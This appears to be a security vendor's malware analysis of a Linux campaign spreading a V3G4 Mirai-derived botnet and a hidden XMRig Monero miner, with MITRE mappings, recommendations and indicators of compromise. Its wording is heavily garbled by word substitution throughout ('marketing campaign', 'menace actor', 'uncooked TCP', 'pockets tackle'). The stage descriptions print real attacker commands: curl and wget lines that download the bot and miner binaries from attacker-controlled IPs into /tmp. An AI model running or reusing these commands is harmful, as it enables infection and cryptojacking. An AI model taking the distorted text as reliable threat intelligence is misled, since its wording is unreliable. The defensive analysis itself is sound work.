V3G4 Mirai Botnet Evolves

Govt Abstract

Cyble Analysis & Intelligence Labs (CRIL) has recognized an lively Linux-targeting marketing campaign that deploys a Mirai-derived botnet, paired with a stealthy, fileless-configured cryptominer.

The menace actor employs a multi-stage an infection chain beginning with a downloader that delivers architecture-specific V3G4 binaries throughout x86_64, ARM, and MIPS programs. As soon as lively, the bot masquerades as systemd-logind, performs atmosphere reconnaissance, conducts large-scale raw-socket SSH scanning, maintains persistent C2 communication, and in the end launches a hid XMRig-based Monero miner dynamically configured at runtime.

This exercise displays the continued evolution of Mirai-lineage threats, more and more mixing DDoS capabilities with covert cryptomining. Fileless configuration, packed binaries, tmpfs staging, and aggressive scanning strategies spotlight the actor’s give attention to evasion and monetization throughout cloud and Web-exposed Linux environments.

This report offers a breakdown of the execution chain, reconnaissance habits, stealth mechanisms, botnet communication, cryptominer deployment workflow, MITRE TTPs, and IOCs recognized in the course of the investigation.

Key Takeaways

• Multi-Stage An infection Chain: Attackers deployed a shell script (named “Common Bot Downloader”) that routinely identifies system structure and downloads the matching bot binary.
• Mirai-Lineage Botnet: The core payload displays behavioral patterns in step with V3G4/Mirai forks, together with SSH scanning, IP spoofing, and DDoS capabilities.
• Stealth and Evasion: The bot masquerades as systemd-logind, detaches from TTY, suppresses outputs, and makes use of localhost TCP socket for inner IPC.
• Uncooked TCP Scanning: Excessive-speed SYN packet spraying on port 22 is used for SSH brute-force propagation throughout the Web.
• DNS-Primarily based C2 Lookup: Multi-threaded DNS queries goal 8.8.8.8 to resolve the C2 area baojunwakuang[.]asia, mapping to 159.75.47[.]123.
• Cryptominer Deployment: The malware downloads an XMRig miner disguised as .dbus-daemon into /tmp and receives mining configuration dynamically from the C2 server.
• Fileless Configuration: Miner parameters, together with pockets tackle, pool, and algorithm, are delivered at runtime, avoiding on-disk artifacts and hindering forensic evaluation.

Overview

This marketing campaign employs a streamlined an infection workflow designed for broad compatibility throughout Linux environments. The primary-stage downloader (common bot downloader) displays a mix of Mirai-style botnet habits, figuring out system structure utilizing uname -m and developing a tailor-made obtain path for the corresponding bot binary hosted at 103.149.93[.]224.

The payload is written into /tmp, assigned executable permissions, and executed instantly—a basic tactic in IoT and cloud-targeting botnets. Determine 1 under showcases an http server internet hosting malicious binaries.

The second stage, Mddos.x86_64, is a statically linked and UPX-packed ELF file with stripped symbols, making static inspection extra difficult. Upon execution, the bot gathers system info, initializes random seeds for timing variability, and prints a signature banner strongly related to V3G4/Mirai-derived strains.

The malware then transitions into stealth mode—renaming its course of to look as a system daemon (systemd-logind), detaching from the terminal, and launching a number of employee threads answerable for assault operations, C2 communication, and IPC coordination.

It makes use of a number of employee threads to execute assault logic in parallel (non‑blocking I/O and pselect(2) used to handle concurrent community operations)

A key attribute of this botnet variant is its use of uncooked TCP sockets, permitting exact crafting of SYN packets for high-velocity SSH scanning campaigns. In parallel, a number of employee threads aggressively resolve the C2 area (www.baojunwakuang[.]asia) via repeated queries to Google Public DNS (8.8.8.8) to keep up resilient command channels.

Lastly, the third stage deploys a covert cryptominer. The loader fetches a UPX-packed XMRig binary from 159.75.47[.]123 and shops it in /tmp/.dbus-daemon to mix with respectable processes. As an alternative of transport a neighborhood configuration file, the miner fetches its configuration dynamically from the C2 server, enabling real-time updates to pockets addresses, mining swimming pools, and algorithms whereas leaving no on-disk artifacts.

Our evaluation confirms that:

• A Mirai-style botnet delivered via a customized loader
• Uncooked TCP SSH scanning from contaminated hosts
• Dynamic, C2-delivered miner configuration
• Course of masquerading for stealth
• Use of tmpfs for staging and execution

Technical Evaluation

Stage-1: Common Bot Downloader Script

The marketing campaign begins with a compact shell script answerable for fetching the Mirai-derived botnet payload from an attacker-controlled server at 103.149.93[.]224.

It initially identifies the CPU structure (uname -m) of the goal system. It maps it to considered one of a number of supported variations of the bot binary (targets Linux gadgets operating on x86_64, arm64, arm7, arm5, mips, mipsel CPU).

Then, it builds a obtain URL to fetch the suitable bot binary within the /tmp listing, assigns executable permissions, and runs it. This aligns with botnets that deploy architecture-specific payloads for propagation. (See Determine 2)

Under is the curl command used for gadgets operating on x86_64 structure.

curl -o Mddos.x86_64 http://103[.]149.93.224/bins/Mddos.x86_64

Stage-2 : Mddos.x86_64 Bot

The bot binary is a UPX-packed, statically linked ELF binary with stripped symbols, with customized routines and wrappers embedded, which complicates static evaluation. (See Determine 3)

Surroundings & Reconnaissance

The malware begins by gathering fundamental details about the sufferer, together with kernel and structure particulars by way of uname(2), and checking the host’s course of limits as a way to decide how aggressively it may well function. The system info is later used to register the sufferer machine with the C2 server. (See Determine 4)

It additionally identifies its personal executable path and initializes a random seed, which is often used to randomize community exercise or timing patterns. After initialization, it prints a signature banner (xXxSlicexXxxVEGA.) to the STDOUT console, which matches the behavioral patterns of V3G4, a Mirai-lineage botnet beforehand documented by Unit42 – Palo Alto Networks in 2023 and noticed in current cloud infections.

Stealth Mechanism

As soon as initialized, the malware shifts into stealth mode. It masquerades itself as a system daemon (“systemd-logind”) utilizing prctl(2) & modifies “/proc/self/cmdline”. Though the write fails because of kernel protections, the intent bears resemblance to extensively used stealth strategies in Mirai forks. (See Determine 5)

That is an try and deceive course of‑inspection instruments by showing as a respectable system service, serving to it mix into course of lists. To additional conceal its exercise, the malware detaches from any controlling terminal utilizing the setsid(2) system name. It closes all normal enter/output streams, permitting it to run silently within the background with out consumer visibility.

It then spawns a number of employee threads answerable for assault operations, watchdog supervision, and communication with its command‑and‑management server. The primary thread initializes a TCP listener on 127.0.0.1:63841, which features as an inner inter‑course of communication (IPC) channel used to coordinate its employee threads and helper processes.

Utilizing localhost TCP visitors helps the malware mix in with respectable system daemons and desktop purposes, making the exercise far much less suspicious than pipes, shared reminiscence, or different IPC strategies that will set off safety monitoring or coverage restrictions. (See Determine 6)

Botnet Communication & Scanning

Uncooked TCP Socket

The method actively performs high-speed SSH scanning throughout the Web. Particularly, the malware opens uncooked TCP sockets to spray SYN packets to port 22 on quite a few goal IP addresses. The IPv4 packet headers recommend manually crafted payloads (beginning with ASCII E / 0x45), and tons of of 40-byte packets are transmitted in fast succession, indicating automated scanning and potential brute-force exercise.

This habits carefully matches that of Mirai-derived botnet households, that are identified for conducting Web-wide SSH scanning campaigns. (See Determine 7)

C2 DNS decision

Along with uncooked sockets, the malware creates normal TCP sockets configured with keepalive choices, permitting persistent connections to command-and-control (C2) infrastructure.

Concurrently, it spawns a number of employee threads that every carry out DNS queries towards 8.8.8.8 to resolve its C2 server (www.baojunwakuang[.]asia resolving to the IP 159.75.47[.]123).

This multi-threaded DNS decision technique is typical of Mirai-style bots, permitting the malware to keep up connectivity and obtain instructions whereas executing assaults in parallel. (See Determine 8)

General, the mixture of uncooked packet era, high-speed port 22 focusing on, and aggressive C2 decision strongly signifies that this malware features as a Mirai-derived SSH scanning and DDoS bot, able to quickly figuring out susceptible hosts and coordinating community assaults.

Stage 3: Cryptominer Deployment & Fileless Configuration

The malware features a devoted cryptomining stage that retrieves and executes an XMRig-based Monero miner, named xmrig.x86_64. The operator employs a number of stealth strategies, together with dynamic (fileless) miner configuration and the usage of a packed, stripped binary to hinder static evaluation.

Miner Supply

Upon execution, the botnet loader types a obtain URL & makes use of wget to fetch a pre-compiled XMRig miner binary from the attacker-controlled server. The binary is dropped within the tmp filesystem, disguised as dbus-daemon. (See Determine 9)

The wget command fashioned is proven under –

wget -q -O /tmp/.dbus-daemon http://159.75.47[.]123/bins/xmrig.x86_64 2>/dev/null

The downloaded payload is:

• UPX-packed, considerably lowering seen code floor.
• Stripped, eradicating image info to thwart reverse engineering.
• Briefly saved underneath a masqueraded path (/tmp/.dbus-daemon) to mix with respectable system recordsdata.

Fileless, C2-Offered Miner Configuration

Not like typical miner deployments that embed a static configuration file on disk (config.json, YAML, and many others.), this pattern requests runtime configuration information instantly from the C2 server. This method permits the operator to:

• Keep away from exposing pockets addresses, pool endpoints, or algorithms throughout static evaluation
• Dynamically rotate mining parameters
• Forestall visibility of miner settings on the contaminated host

Throughout execution, the miner connects again to the identical C2 (159.75.47[.]123) and points a configuration request. The server responds with a JSON blob containing the pool URL, pockets tackle, algorithm, and thread rely. Discuss with Determine 10 under for the configuration captured in the course of the evaluation.

Determine 11 under reveals the extracted configuration information in readable kind:

Conclusion

This marketing campaign represents a complicated and financially motivated operation combining botnet propagation with stealthy cryptomining. The attacker employs a number of superior strategies—together with raw-socket scanning, masqueraded processes, inner localhost IPC, dynamic DNS decision, and fileless miner configuration—to evade detection and keep long-term persistence on compromised gadgets.

The mixing of Mirai-based DDoS capabilities with XMRig-based mining displays the continued pattern of hybrid monetization methods, the place menace actors maximize ROI by leveraging contaminated gadgets not just for botnet assaults but in addition for illicit cryptocurrency mining.

Organizations working Linux servers, cloud workloads, or uncovered IoT gadgets stay high-value targets and may prioritize hardening and steady monitoring to mitigate their danger.

Cyble’s Risk Intelligence Platforms repeatedly monitor rising threats, phishing infrastructure, and malware exercise throughout the darkish net, deep net, and open sources. This proactive intelligence empowers organizations with early detection, model and area safety, infrastructure mapping, and attribution insights. Altogether, these capabilities present a essential head begin in mitigating and responding to evolving cyber threats.

Our Suggestions

Now we have listed some important cybersecurity finest practices that create the primary line of management towards attackers. We advocate that our readers observe the perfect practices given under:

1. Harden Exterior Assault Floor

• Disable password-based SSH authentication; implement key-based entry.
• Apply rate-limiting or geo-restrictions on SSH (port 22).
• Guarantee pointless internet-exposed providers are closed.

2. Monitor for Anomalous Community Exercise

• Detect uncooked TCP packet floods focusing on port 22.
• Monitor for uncommon outbound connections to suspicious IPs and domains.

3. Deploy File Integrity & Runtime Monitoring

• Alert on obtain + execution of binaries from /tmp or /dev/shm.
• Detect uncommon course of names resembling systemd-logind originating from non-system paths.
• Monitor for UPX-packed ELF binaries on endpoints.

4. Strengthen Cloud and Linux Safety Posture

• Allow SELinux/AppArmor enforcement.
• Limit write/execute permissions on momentary filesystems.
• Implement EDR options able to analyzing Linux course of habits.

5. Proactive Risk Searching

• Hunt for proof of XMRig execution.
• Seek for traces of raw-socket creation or SYN-flood-like habits.
• Examine programs for masqueraded processes or hidden botnet listeners (e.g., 127.0.0.1:63841).

6. Patch and Replace Repeatedly

• Guarantee Linux kernels, SSH providers, and IoT firmware stay updated, closing vulnerabilities exploited by botnet operators.

MITRE ATT&CK® Methods

Tactic	Method ID	Process
Reconnaissance (TA0043)	Collect Sufferer Host Info (T1592)*	Collects system particulars utilizing uname, course of limits, structure, and hostname for C2 registration.
Useful resource Growth (TA0042)	Purchase Infrastructure — Infrastructure as a Service (T1583.003)	C2 and payload distribution servers hosted at 103.149.93[.]224 and 159.75.47[.]123.
Preliminary Entry (TA0001)	Legitimate Accounts (T1078)	SSH brute-force makes an attempt to realize credentials and entry extra Linux hosts.
Execution (TA0002)	Command and Scripting Interpreter — Unix Shell (T1059.004)	Downloader script makes use of curl/wget to fetch and execute the bot payload.
Execution (TA0002)	Native API (T1106)	Bot makes use of syscalls (setsid, prctl) for stealth.
Protection Evasion (TA0005)	Masquerading (T1036.005)	Renames/processes set to look like respectable system providers (e.g., systemd-logind).
Protection Evasion (TA0005)	Obfuscated/Encrypted Information or Info (T1027)	Payloads are UPX-packed and stripped to complicate evaluation.
Protection Evasion (TA0005)	Cover Artifacts (T1564.001 – Hidden Information/Directories)	Miner dropped as /tmp/.dbus-daemon to mix with respectable recordsdata.
Discovery (TA0007)	System Community Configuration Discovery (T1016) / System Info Discovery (T1082)	Gathers kernel, structure, course of limits, and host identifiers.
Lateral Motion (TA0008)	Distant Companies — SSH (T1021.004)	Leverages SSH brute-force to maneuver laterally throughout reachable programs.
Command & Management (TA0011)	Utility Layer Protocol — DNS (T1071.004)	Multi-threaded DNS queries to eight.8.8.8 resolving http://www.baojunwakuang[.]asia → 159.75.47[.]123.
Command & Management (TA0011)	(T1571)Non-Commonplace Port	159.75.47[.]123:60194 used to fetch miner configuration and locaused fLocalhost TCP listener on 127.0.0.1:63841.
Impression (TA0040)	Community Denial of Service (T1498)	Able to launching DDoS assaults.
Impression (TA0040)	Useful resource Hijacking (T1496)	Deploys XMRig to eat CPU sources and mine Monero for monetary acquire.

Indicators of Compromise (IOCs)

Indicators	Indicator Sort	Description
103.149.93[.]224	IP Tackle	HTTP server internet hosting Bot Binaries
159.75.47[.]123	IP Tackle	C2 IP
www[.]baojunwakuang[.]asia	Area	C2 Area
Hxxps://103.149.93[.]224/bins/Mddos.x86_64	URL	Obtain URL for x86_64 bot binary
Hxxps://103.149.93[.]224/bins/Mddos.arm64	URL	Obtain URL for arm64 bot binary
Hxxps://103.149.93[.]224/bins/Mddos.arm7	URL	Obtain URL for arm7 bot binary
Hxxps://103.149.93[.]224/bins/Mddos.arm5	URL	Obtain URL for arm5 bot binary
Hxxps://103.149.93[.]224/bins/Mddos.mips	URL	Obtain URL for mips bot binary
Hxxps://103.149.93[.]224/bins/Mddos.mpsl	URL	Obtain URL for the mpsl bot binary
Hxxps://159.75.47[.]123/bins/xmrig.x86_64	URL	Obtain URL for cryptominer binary
Auto.c3pool[.]org:19999	Pool	Mining pool
4AAjsvwrMQxBJpExraeoqdKrV8bwz2kkJG7P4axGTSip46CjmCrvSa8dztbNC4n6XuLr8wiXYgxS9c979hpdmi6s3LCNNja	ID	Crypto Pockets
2c0261e6a3590e3554202116c5398637d0d7900895646d0aaf46d117aadd1612	SHA256 Hash	Mddos binary ARM
8350cd4e9b2f1056c8ccdf0d1b2406b32634840aa304d535ad4b6be5b365275c	SHA256 Hash	Common Bot Downloader script
d5c55f18b1a7c01d3e4fb657b00aa677784640fef3c1742243a65ded07aeccc6	SHA256 Hash	Mddos.x86_64
4ad4fe754acde2f79ced013d7dc7260e111ea23c7a47001e3fb16aa5d268852a	SHA256 Hash	Mddos.x86_64
2e6fecefa3062d2306124e014643a14066981f4865dedbeffb8c1d057dc650b2	SHA256 Hash	Mddos.arm64
f838c2ec86c444d09956934948a28ff6459da7afe820682ead81e4a95deb703a	SHA256 Hash	Mddos.arm7
39ead6055306739ab969a3531bde2050f556b05e500894b3cda120178f2773be	SHA256 Hash	xmrig.x86_64
90e28c0d2f2ce83164c2bfdcf42a8746ff055b35b81c95d4b18639b1f2e96885	SHA256 Hash	xmrig.x86_64